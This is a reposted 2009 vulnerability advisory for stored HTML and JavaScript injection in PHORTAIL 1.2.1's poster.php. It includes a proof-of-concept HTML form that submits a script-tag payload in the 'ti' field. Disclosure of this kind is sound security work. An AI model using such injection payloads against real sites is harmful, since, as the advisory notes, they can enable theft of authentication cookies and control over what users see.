No account yet?
Home » Exploits » PHORTAIL 'poster.php' Multiple HTML Injection Vulnerabilities
PHORTAIL 'poster.php' Multiple HTML Injection Vulnerabilities E-mail
Feeds - Exploits
Written by Jonathan Salwan   
Wednesday, 11 March 2009 22:05
PHORTAIL 'poster.php' Multiple HTML Injection Vulnerabilities


-\\Bugtraq ID:
34038

-\\Class:
Input Validation Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 09 2009 12:00AM

-\\Updated:
Mar 11 2009 07:16PM

-\\Credit:
Jonathan Salwan



-\\Vulnerable:
PHORTAIL PHORTAIL 1.2.1



-\\Discussion
PHORTAIL is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

PHORTAIL 1.2.1 is vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
Attackers can use a browser to exploit these issues.

The following exploit code is available:

===============================================================
34038.html
^^^^^^^^^^^
<html><head><title>PHORTAIL v1.2.1 XSS Vulnerability</title></head>
<hr><pre>
Module   : PHORTAIL 1.2.1
download : http://www.phpscripts-fr.net/scripts/download.php?id=330
Vul      : XSS Vulnerability
file     : poster.php
Author   : Jonathan Salwan
Mail     : submit [AT] shell-storm.org
Web      : http://www.shell-storm.org
</pre><hr>

<form name="rapporter" action="http://www.example.com/poster.php" method="POST"></br>
    <input type="hidden" name="ajn" value="1">
    <input type="text" name="pseudo" value="xss">=>Pseudo</br>
    <input type="text" name="email"  value=" This e-mail address is being protected from spambots. You need JavaScript enabled to view it ">=>E-mail</br>
    <input type="text" name="ti"     value="<script>alert(&#039;xss PoC&#039;);</script>">=>XSS vulnerability</br>
    <input type="text" name="txt"    value="xss">=>text</br>
    <input type="submit" value="Start"></br>
</form>
</html>




-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .



-\\References(s)
--PHORTAIL v1.2.1 XSS Vulnerability
http://packetstorm.linuxsecurity.com/0903-exploits/phortail-xss.tx  (Jonathan Salwan)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff